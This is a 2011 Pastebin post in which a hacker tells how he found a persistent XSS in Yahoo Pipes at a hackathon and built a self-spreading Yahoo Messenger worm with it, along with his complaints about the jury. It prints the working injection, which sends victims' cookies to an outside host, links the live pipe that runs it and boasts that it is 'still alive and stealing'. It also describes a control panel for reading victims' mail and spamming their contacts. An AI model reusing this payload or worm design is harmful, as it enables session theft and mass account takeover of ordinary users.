Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

pax

By: a guest on May 15th, 2011  |  syntax: None  |  size: 6.77 KB  |  views: 5,163  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. In this document I joined all the reponses, tweets and other pastes for easy access and no expiration. Please RT this.
  2.  
  3. =======================
  4. The event
  5. =======================
  6.  
  7. /*
  8. This weekend I attended Yahoo OpenHack Bucharest. I signed up only for TechTalks, but after some abstract useless shit about crappy Yahoo frameworks and services I thought I needed some relaxation. In about 10 minutes, in my Pall Mall break, I found a XSS in Yahoo's Pipe service ( pipes.yahoo.com ). I did some social and got into the programming sessions for the next day's project presentation. After 6 hours I managed to specially craft my persistent XSS injection so that it could run on any browser. After 15 hours, me and my team mate Cheater, we wrote down our project : Yahoo Self Spreading Worm via Instant Messaging using an ALIVE XSS. Note that our project was the only one that truly defined the term "hack" ( the irony ). The other 'hacks' were just some one day Yahoo APIs and frameworks implementations, mainly orientated to the social area ( thou there was a nice facial recon project ). The victims were accessing the worm which ran the XSS payload to steal their cookies and used them to fetch and spam their contacts for further grabbing and spamming. We had 90s to present our work; just an orientative limit ( if the project was interesting then the jury permited you to pass this limit with about 30s ). I took my place on the stage, connected my laptop to their wired network and projector. After 70s since I've started talking about the worm ( time in which the crowd was shouting and enthuziastic ) my internet connection started to malfunction. At the 90th second they mutted my microphone and unplugged me from the projector. I refused to let it go and told them that "They should see this", but in vain, they seemed very offenced. After the software presentations ended, the jury ( formed by big hot shots from Yahoo ) called me to talk with them. I fully disclosed the unsanitized vulnerable parameter in their Pipe service, I showed them how it works, how it grabs, how it spams, sends, checks, I even tested it to grab my own cookies for further demonstration ( which was a success ). I did all of this because I was hoping for a place on the podium. At the end, they didn't metion me, didn't thank me, didn't salute me. In my objective opinion ( and others as well ) they were complete bitches, but it doesen't matter because I fucked them at their own 'hack' contest.
  9. */
  10.  
  11. (Another one:)
  12.  
  13. /*
  14. Me & Cheater presented a Yahoo Self Spreading Worm with an ALIVE XSS attached to it. Our team was called "Screw Tinkode the Skiddie" and we are part of the Romanian Security Team ( rstcenter.com ). We found the XSS hole in the first day of OpenHack ( 10 minutes to find it, 6 hours to craft the injection for filter evasion ) and took us 15 hours to develop the worm. The worm was self spreading via instant messaging on Yahoo Messenger. The contacts were reciving IMs with a link appended to them; if they had opened the malicious web page their cookies had have been stolen and given to the worm. Having new victims, the worm uses their cookies to spread more IMs with malicious content. Besides the automated process, we also had a control panel with the following functions ( all based on cookie authentication and manipulation, no password required ) :
  15.  
  16. - list all the victims by their Yahoo IDs
  17. - log in on a victim's email account
  18. - fetch a victim's contact list
  19. - mass send a message to all of a victim's contacts
  20.  
  21. I didn't have enough time to present the control panel due to sabotage; no more internet access.
  22.  
  23. After my incomplete short presentation of the full potential of the worm, in the break between the software and hardware presentation, the Yahoo Jury ( formed by big shot guys ) had a little talk with me and Cheater.
  24. */
  25.  
  26. =======================
  27. The interview
  28. =======================
  29.  
  30. /*
  31. Korben took me an interview at OpenHack while I was working on the worm.
  32. URL : http://www.korben.info/xss-yahoo-mail.html
  33.  
  34. For the moment I am chatting with journalists, so expect some articles somewhere :)
  35. */
  36.  
  37. ======================
  38. The XSS
  39. ======================
  40.  
  41. /*
  42. Still alive and stealing at (UTC+02:00) 1:27:11 AM Monday, ‎May ‎16, ‎2011.
  43.  
  44. The XSS injection :
  45.  
  46. <!--<img src="--><img id="poza" name="poza" src=""><img src=y onerror="document['poza'].src = 'http://0.505.ru/openhax/stream.php?cook='+escape(document.cookie)" //">
  47.  
  48. Can be found running in my pipe.
  49. URL : http://pipes.yahoo.com/pipes/pipe.edit?_id=5828e3e6f06bd006372d3969a93abc21
  50. */
  51.  
  52. ======================
  53. Further Detailes
  54. ======================
  55.  
  56. /*
  57. The story is simple as it gets :
  58.  
  59. I raced for a prize and that XSS hole found was perfect. I made my worm to crawl just like in honey. The Yahoo big shots were upset for that and fucked me off. Some Romanian guy, part of the staff, told me that they were considering giving me something, but thinking is not acting. This is not a frustration because I didn't get a prize, now I have more than enough, I have my story being published over the internet; I managed to expose the Yahoo security and their officials' reaction to this kind of stuff at their own event, and this was the main purpose !
  60.  
  61. Some tech info :
  62.  
  63. Yahoo Pipes is a service for those developers who use Yahoo tools. I managed to trick a URL input Pipe module so that it will spit out my malicious code when accessed. That malicious code makes a request to my page with your cookies, saving them for instant or later use. Using your cookies means that I can access your email account without any password and because of my self spreading technique function I can mass instant message all of your contacts from your Yahoo ID poiting them to follow a malicious web page that has the hidden Pipe module somewhere inside it, and the chain goes on.
  64.  
  65. As soon as I disclosed the vulnerability, a Yahoo big shot started to write sms. I thought it will be patched by now, but seems that they are having difficulties.
  66.  
  67. I will release a video in which I was explaining the vulnerability to the Yahoo hot shots. Must see their faces.
  68. */
  69.  
  70. ======================
  71. Mentions
  72. ======================
  73.  
  74. /*
  75. The Secret Services took part and fotos at the event. I'm not the only one who spotted them.
  76. */
  77.  
  78. ======================
  79. The Team
  80. ======================
  81.  
  82. /*
  83. Composed by me ( pax ) and Cheater.
  84. Team called : "Screw Tinkode the Skiddie".
  85. Project named : "Yahoo Self Spreading Worm".
  86. Photos with us :
  87. http://rstcenter.com/forum/33822-yahoo-open-hack-europe-2011-a-4.rst#post237259
  88. Kisses for : Nytro, Cifratorul, Turnback, Alex, Seven, Cristig.
  89. */
  90.  
  91. ======================
  92. Updates
  93. ======================
  94.  
  95. /*
  96. Stay close to twitter.com/paxnwo
  97. */
  98.  
  99. ======================
  100. Contact
  101. ======================
  102.  
  103. /*
  104. pax/|@|\secure.cn.com
  105. */